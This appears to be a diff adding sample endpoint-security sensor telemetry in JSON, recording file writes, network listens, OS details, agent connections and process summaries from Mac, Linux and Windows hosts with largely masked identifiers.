+{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 
26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} +{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"67.43.156.14","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 
26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} +{"AgentVersion":"6.24.13701.0","aip":"67.43.156.14","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 
18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} +{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} +{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"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","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"67.43.156.14","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; 
root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} 
+{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} +{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"67.43.156.14","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} +{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} +{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"67.43.156.14","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} +{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"67.43.156.14","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 
x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"}
+{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"}
+{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"67.43.156.13","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"}
+{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"CommandLine":"uname 
-a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"}
+{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"}
+{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRem
oteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"}
